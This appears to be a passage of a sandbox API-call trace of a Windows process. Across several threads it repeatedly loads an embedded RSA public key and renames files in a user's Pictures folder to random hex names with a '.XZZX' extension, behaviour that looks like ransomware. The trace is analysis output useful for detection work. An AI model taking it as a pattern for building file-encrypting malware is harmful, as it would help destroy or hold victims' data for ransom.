returned="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" [0250.105] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.106] SetErrorMode (uMode=0x1) returned 0x1 [0250.106] lstrcpyW (in: lpString1=0x2baf860, lpString2="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" | out: lpString1="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX") returned="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" [0250.106] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x9ee8df35, Data2=0x3904, Data3=0x40ca, Data4=([0]=0x82, [1]=0xff, [2]=0x70, [3]=0xb4, [4]=0x8e, [5]=0xe4, [6]=0x8a, [7]=0x6e))) returned 0x0 [0250.106] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\90EAB1CE03D6A9CCF759AEE907F78E14.XZZX") returned 80 [0250.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0250.106] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\555649D40E6DFD289EE8DF351128E170.XZZX") returned 80 [0250.106] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1012 os_tid = 0x12e0 [0250.262] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.262] lstrcpyW (in: lpString1=0x2baf460, lpString2="A74BC39B153F2E46BB66A40D1960128E.XZZX" | out: lpString1="A74BC39B153F2E46BB66A40D1960128E.XZZX") returned="A74BC39B153F2E46BB66A40D1960128E.XZZX" [0250.262] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.262] SetErrorMode (uMode=0x1) returned 0x1 [0250.262] lstrcpyW (in: lpString1=0x2baf860, lpString2="A74BC39B153F2E46BB66A40D1960128E.XZZX" | out: lpString1="A74BC39B153F2E46BB66A40D1960128E.XZZX") returned="A74BC39B153F2E46BB66A40D1960128E.XZZX" [0250.262] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xc2080a75, Data2=0xf29d, Data3=0x4984, Data4=([0]=0xae, [1]=0xb6, [2]=0xd1, [3]=0x4d, [4]=0xea, [5]=0xa9, [6]=0xac, [7]=0x1a))) returned 0x0 [0250.262] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\A74BC39B153F2E46BB66A40D1960128E.XZZX") returned 80 [0250.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0250.262] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\98D103C145ABDDF4C2080A754866C23C.XZZX") returned 80 [0250.262] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1013 os_tid = 0x12e4 [0250.418] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.418] lstrcpyW (in: lpString1=0x2baf460, lpString2="BD094FF047045CCAB6A2A1584B394112.XZZX" | out: lpString1="BD094FF047045CCAB6A2A1584B394112.XZZX") returned="BD094FF047045CCAB6A2A1584B394112.XZZX" [0250.418] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.418] SetErrorMode (uMode=0x1) returned 0x1 [0250.418] lstrcpyW (in: lpString1=0x2baf860, lpString2="BD094FF047045CCAB6A2A1584B394112.XZZX" | out: lpString1="BD094FF047045CCAB6A2A1584B394112.XZZX") returned="BD094FF047045CCAB6A2A1584B394112.XZZX" [0250.418] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xb1e5b18c, Data2=0xf5a0, Data3=0x4e91, Data4=([0]=0x8d, [1]=0xa6, [2]=0x1e, [3]=0x8d, [4]=0x4b, [5]=0x90, [6]=0x4e, [7]=0x22))) returned 0x0 [0250.418] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BD094FF047045CCAB6A2A1584B394112.XZZX") returned 80 [0250.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0250.418] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0279F3804B61DFA0B1E5B18C4E1CC3E8.XZZX") returned 80 [0250.418] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1014 os_tid = 0x12e8 [0250.574] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.574] lstrcpyW (in: lpString1=0x2baf460, lpString2="C22D6D6701D063BFF430045506304807.XZZX" | out: lpString1="C22D6D6701D063BFF430045506304807.XZZX") returned="C22D6D6701D063BFF430045506304807.XZZX" [0250.574] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.574] SetErrorMode (uMode=0x1) returned 0x1 [0250.574] lstrcpyW (in: lpString1=0x2baf860, lpString2="C22D6D6701D063BFF430045506304807.XZZX" | out: lpString1="C22D6D6701D063BFF430045506304807.XZZX") returned="C22D6D6701D063BFF430045506304807.XZZX" [0250.574] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x75f481ed, Data2=0x40ac, Data3=0x414a, Data4=([0]=0xa7, [1]=0xcd, [2]=0xc1, [3]=0x97, [4]=0xed, [5]=0x41, [6]=0xfe, [7]=0xfd))) returned 0x0 [0250.574] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C22D6D6701D063BFF430045506304807.XZZX") returned 80 [0250.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0250.574] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\60C28B3C107E5DB875F481ED13394200.XZZX") returned 80 [0250.574] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1015 os_tid = 0x12ec [0250.729] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.729] lstrcpyW (in: lpString1=0x2baf460, lpString2="C30CF4F82E58715357484B18328D559B.XZZX" | out: lpString1="C30CF4F82E58715357484B18328D559B.XZZX") returned="C30CF4F82E58715357484B18328D559B.XZZX" [0250.729] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.730] SetErrorMode (uMode=0x1) returned 0x1 [0250.730] lstrcpyW (in: lpString1=0x2baf860, lpString2="C30CF4F82E58715357484B18328D559B.XZZX" | out: lpString1="C30CF4F82E58715357484B18328D559B.XZZX") returned="C30CF4F82E58715357484B18328D559B.XZZX" [0250.730] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xb4bc9331, Data2=0x598a, Data3=0x422d, Data4=([0]=0x9d, [1]=0x76, [2]=0x34, [3]=0xa1, [4]=0xd8, [5]=0x8e, [6]=0xe0, [7]=0xcf))) returned 0x0 [0250.730] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C30CF4F82E58715357484B18328D559B.XZZX") returned 80 [0250.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0250.730] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FCD3616A17255142B4BC933119E0358A.XZZX") returned 80 [0250.730] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1016 os_tid = 0x12f0 [0250.886] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.886] lstrcpyW (in: lpString1=0x2baf460, lpString2="C355F5402BEDF72E504955A0300EDB76.XZZX" | out: lpString1="C355F5402BEDF72E504955A0300EDB76.XZZX") returned="C355F5402BEDF72E504955A0300EDB76.XZZX" [0250.886] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.886] SetErrorMode (uMode=0x1) returned 0x1 [0250.886] lstrcpyW (in: lpString1=0x2baf860, lpString2="C355F5402BEDF72E504955A0300EDB76.XZZX" | out: lpString1="C355F5402BEDF72E504955A0300EDB76.XZZX") returned="C355F5402BEDF72E504955A0300EDB76.XZZX" [0250.886] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xed943c7, Data2=0xece5, Data3=0x4735, Data4=([0]=0xa6, [1]=0xeb, [2]=0x9, [3]=0x5e, [4]=0x58, [5]=0x6d, [6]=0x42, [7]=0x73))) returned 0x0 [0250.886] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C355F5402BEDF72E504955A0300EDB76.XZZX") returned 80 [0250.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0250.886] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\92D5150341E48E690ED943C7449F72B1.XZZX") returned 80 [0250.886] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1017 os_tid = 0x12f4 [0251.042] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.042] lstrcpyW (in: lpString1=0x2baf460, lpString2="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" | out: lpString1="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX") returned="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" [0251.042] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.042] SetErrorMode (uMode=0x1) returned 0x1 [0251.042] lstrcpyW (in: lpString1=0x2baf860, lpString2="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" | out: lpString1="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX") returned="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" [0251.042] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xe942df46, Data2=0x520e, Data3=0x4880, Data4=([0]=0x8c, [1]=0x9b, [2]=0x7, [3]=0x46, [4]=0xd2, [5]=0x16, [6]=0x8f, [7]=0x23))) returned 0x0 [0251.042] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C87868381959CC9C63DBF2EC1D8EB0E4.XZZX") returned 80 [0251.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0251.042] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2D2CA1D4173CF700E942DF4619F7DB48.XZZX") returned 80 [0251.042] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1018 os_tid = 0x12f8 [0251.198] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.198] lstrcpyW (in: lpString1=0x2baf460, lpString2="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" | out: lpString1="D2FBB85013E759FE97CF4AF0181D3E46.XZZX") returned="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" [0251.198] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.198] SetErrorMode (uMode=0x1) returned 0x1 [0251.198] lstrcpyW (in: lpString1=0x2baf860, lpString2="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" | out: lpString1="D2FBB85013E759FE97CF4AF0181D3E46.XZZX") returned="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" [0251.198] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xfe3e6af0, Data2=0xf2d4, Data3=0x4f9d, Data4=([0]=0x90, [1]=0xcf, [2]=0xc3, [3]=0xb5, [4]=0xa5, [5]=0x4d, [6]=0x3e, [7]=0x5c))) returned 0x0 [0251.198] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D2FBB85013E759FE97CF4AF0181D3E46.XZZX") returned 80 [0251.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0251.198] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8CC76EC04B845804FE3E6AF04E3F3C4C.XZZX") returned 80 [0251.198] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1019 os_tid = 0x12fc [0251.353] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0251.353] lstrcpyW (in: lpString1=0x2baf460, lpString2="D3D882303025B5406F9968D234469988.XZZX" | out: lpString1="D3D882303025B5406F9968D234469988.XZZX") returned="D3D882303025B5406F9968D234469988.XZZX" [0251.353] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0251.353] SetErrorMode (uMode=0x1) returned 0x1 [0251.354] lstrcpyW (in: lpString1=0x2baf860, lpString2="D3D882303025B5406F9968D234469988.XZZX" | out: lpString1="D3D882303025B5406F9968D234469988.XZZX") returned="D3D882303025B5406F9968D234469988.XZZX" [0251.354] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xfdfcbf1a, Data2=0x98c6, Data3=0x4a53, Data4=([0]=0x9d, [1]=0xec, [2]=0x75, [3]=0x90, [4]=0xaf, [5]=0x6c, [6]=0x21, [7]=0xeb))) returned 0x0 [0251.354] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS 